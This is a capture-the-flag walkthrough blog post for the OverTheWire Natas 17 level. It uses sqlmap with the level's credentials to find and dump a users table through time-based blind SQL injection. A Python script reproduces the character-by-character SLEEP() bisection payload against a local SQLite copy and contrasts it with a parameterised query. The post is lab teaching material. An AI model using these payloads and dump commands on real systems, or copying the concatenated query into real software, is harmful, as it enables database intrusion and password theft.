Natas 17 — Blind SQL Injection with SQLMap

Miguel Sampaio da Veiga
Published in Hacker Toolbelt
3 min read · Jul 9, 2019

Welcome back to the Natas series. Let's take a look at Natas 17. Before jumping in, open OWASP ZAP and use the browser configured through it, so that you get its fantastic HUD.

Firefox with ZAP HUD

Let’s use that HUD. First, set your scope to ‘natas17’ using the top left button (Out):

Out button
Add domain to scope

This way we're preparing ZAP to capture only the requests and responses that matter to us. Now, back to our level: it looks like Natas 15 all over again, so we'll handle it the same way, typing something into the box and reading the output. Trying 'natas17'... nothing. Trying 'natas18'... nothing. Unlike Natas 15, the page prints nothing at all, whatever we submit. We could look at the source code to find out what is going on behind the curtain, but not now.

What do we know so far? We have a form with a text input that gives no output at all. Could it still be vulnerable? Let's look at the request ZAP captured and see how we can feed it to sqlmap:

natas request

Open a terminal window and write the SQLMap command with parameters:

$ sqlmap -u "http://natas17.natas.labs.overthewire.org/index.php" --proxy=http://127.0.0.1:8080 --data="username=natas17" --auth-type=basic --auth-cred="natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw"

Let’s break things down:

  • -u "http://natas17.natas.labs.overthewire.org/index.php": the Natas 17 URL
  • --proxy=http://127.0.0.1:8080: route everything through ZAP as the HTTP proxy, so we can inspect every request sqlmap sends in the HUD
  • --data="username=natas17": the POST body; username is the parameter we're testing, and giving --data also tells sqlmap to send POST requests like the form does
  • --auth-type=basic: the site uses HTTP Basic authentication
  • --auth-cred="natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw": the username/password of our current level, the same ones the browser prompts for

Press ‘enter’ and wait…

First SQLMap execution

With the default --level=1 and --risk=1 sqlmap reports no injectable parameter in this run, so let's raise both to --level=5 and --risk=3. Level 5 turns on every payload and parameter location sqlmap knows about, and risk 3 adds the OR-based tests, which are left out by default because they can change data if the injection lands in an UPDATE or DELETE statement (fine in a lab, something to think twice about on a real engagement):

$ sqlmap -u "http://natas17.natas.labs.overthewire.org/index.php" --proxy=http://127.0.0.1:8080 --data="username=natas18" --auth-type=basic --auth-cred="natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw" --level=5 --risk=3

This will take some time: with no output to read, sqlmap can only tell whether a payload fired by timing the response, and every test costs at least one deliberate delay.

We can add one more parameter, --dbms=mysql, since we already know the backend is MySQL. That lets sqlmap skip the fingerprinting step and the payloads written for other database engines, which shortens the run noticeably.
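The page gives no output at all, so the only side channel left is time, and that is what sqlmap is exercising when it pushes SLEEP()-style payloads at the parameter. The script below is an added example, not code from this post or from sqlmap: it rebuilds that inference by hand against an in-memory SQLite database that stands in for the level's MySQL backend (the table, the rows and the passwords are constructed sample data, and SLEEP() is registered as a Python function because SQLite has none). It bisects each character of the target's password through a conditional delay, then shows that the same payload recovers nothing once the query binds the input as a parameter. The MySQL spelling of the payload is given in the comments; SQLite needs CASE/unicode/substr instead of IF/ASCII/SUBSTRING.

```python
import sqlite3
import time

# Seconds the injected SLEEP() pauses. Kept small so the whole demo runs in a
# second or two; against a real target you would use a few seconds to beat jitter.
DELAY = 0.05


def build_db():
    """In-memory SQLite stand-in for the level's MySQL database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the MySQL-style payload behaves the same way.
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("natas17", "not-the-real-password"), ("natas18", "xK9a1Qz")],
    )
    return conn


def check_user_vulnerable(conn, username):
    """The level's form as the post describes it: the input is concatenated straight
    into the query and nothing at all is sent back, so only timing can leak."""
    query = f"SELECT * FROM users WHERE username='{username}'"
    conn.execute(query).fetchall()
    return None


def check_user_safe(conn, username):
    """Same lookup with a bound parameter: the input can never alter the SQL."""
    conn.execute("SELECT * FROM users WHERE username=?", (username,)).fetchall()
    return None


def probe(conn, payload, checker=check_user_vulnerable):
    """True if the request took at least half of DELAY, i.e. the injected SLEEP() ran."""
    start = time.monotonic()
    checker(conn, payload)
    return time.monotonic() - start >= DELAY / 2


def extract_password(conn, target="natas18", max_len=64, checker=check_user_vulnerable):
    """Recover `target`'s password one character at a time, bisecting on its code point.

    SQLite payload used here (P = position, M = pivot, D = delay):
      natas18' AND (SELECT CASE WHEN unicode(substr(password,P,1))>M THEN SLEEP(D)
                    ELSE 0 END FROM users WHERE username='natas18')--
    MySQL equivalent of the same test:
      natas18' AND IF(ASCII(SUBSTRING(password,P,1))>M, SLEEP(D), 0)-- -
    Past the end of the string substr() yields '' and unicode('') is NULL in SQLite,
    so every probe is false, the bisection lands on 0 and the loop stops.
    Assumes an ASCII password, as the Natas ones are.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127          # code point of this character lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (
                f"{target}' AND (SELECT CASE WHEN unicode(substr(password,{pos},1))>{mid} "
                f"THEN SLEEP({DELAY}) ELSE 0 END FROM users WHERE username='{target}')-- "
            )
            if probe(conn, payload, checker):
                lo = mid + 1     # delay fired: the character is greater than mid
            else:
                hi = mid         # no delay: the character is at most mid
        if lo == 0:
            break                # ran off the end of the password
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable form leaks:", extract_password(db))
    print("parameterised form leaks:", repr(extract_password(db, checker=check_user_safe)))
```

Seven probes per character is exactly the bisection sqlmap performs once it has confirmed a time-based blind injection, which is why the dump step later on takes minutes rather than seconds: every bit of every character costs a full delay.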

SQLMap output

Finally. Let's list the databases by adding the --dbs parameter:

sqlmap --dbs output: the available databases

Now let's enumerate the tables in that database with -D natas17 --tables:

sqlmap --tables output: the tables in the natas17 database

And the columns, with -D natas17 -T users --columns:

sqlmap --columns output: the columns of the users table

Exploration time is over. Time to collect our prize:

$ sqlmap -u "http://natas17.natas.labs.overthewire.org/index.php" --proxy=http://127.0.0.1:8080 --data="username=natas18" --auth-type=basic --auth-cred="natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw" --level=5 --risk=3 --dbms=mysql -D natas17 -T users --dump

Table dump and password

Finally we got the flag. Natas 18 is up next.
